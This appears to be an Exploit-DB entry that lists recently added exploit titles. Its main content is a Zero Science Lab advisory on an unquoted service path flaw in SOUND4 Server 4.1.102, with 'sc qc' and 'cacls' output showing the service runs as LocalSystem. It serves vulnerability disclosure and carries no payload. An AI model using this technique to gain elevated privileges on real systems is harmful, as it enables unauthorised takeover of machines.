
25 changes to exploits/shellcodes/ghdb EQ Enterprise management system v2.2.0 - SQL Injection qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) ASKEY RTF3505VW-N1 - Privilege Escalation Bangresto 1.0 - SQL Injection Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) Cacti v1.2.22 - Remote Command Execution (RCE) Judging Management System v1.0 - Authentication Bypass Judging Management System v1.0 - Remote Code Execution (RCE) rconfig 3.9.7 - Sql Injection (Authenticated) Senayan Library Management System v9.0.0 - SQL Injection Spitfire CMS 1.0.475 - PHP Object Injection Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) WooCommerce v7.1.0 - Remote Code Execution(RCE) CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset SOUND4 Server Service 4.1.102 - Local Privilege Escalation macOS/x64 - Execve Null-Free Shellcode
61 lines
No EOL
2.3 KiB
Text
61 lines
No EOL
2.3 KiB
Text
# Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation
|
|
# Exploit Author: LiquidWorm
|
|
|
|
Vendor: SOUND4 Ltd.
|
|
Product web page: https://www.sound4.com | https://www.sound4.biz
|
|
Affected version: 4.1.102
|
|
|
|
Summary: SOUND4 Windows Server Service.
|
|
|
|
Desc: The application suffers from an unquoted search path issue impacting
|
|
the service 'SOUND4 Server' for Windows. This could potentially allow an
|
|
authorized but non-privileged local user to execute arbitrary code with
|
|
elevated privileges on the system. A successful attempt would require the
|
|
local user to be able to insert their code in the system root path undetected
|
|
by the OS or other security applications where it could potentially be executed
|
|
during application startup or reboot. If successful, the local user's code
|
|
would execute with the elevated privileges of the application.
|
|
|
|
Tested on: Windows 10 Home 64 bit (build 9200)
|
|
SOUND4 Server v4.1.102
|
|
SOUND4 Remote Control v4.3.17
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
Macedonian Information Security Research and Development Laboratory
|
|
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2022-5721
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php
|
|
|
|
|
|
26.09.2022
|
|
|
|
--
|
|
|
|
|
|
C:\>sc qc "SOUND4 Server"
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: SOUND4 Server
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : SOUND4 Server
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"
|
|
C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F
|
|
BUILTIN\Administrators:(ID)F
|
|
BUILTIN\Users:(ID)R
|
|
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
|
|
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
|
|
|
|
|
|
C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V
|
|
4.1.102 |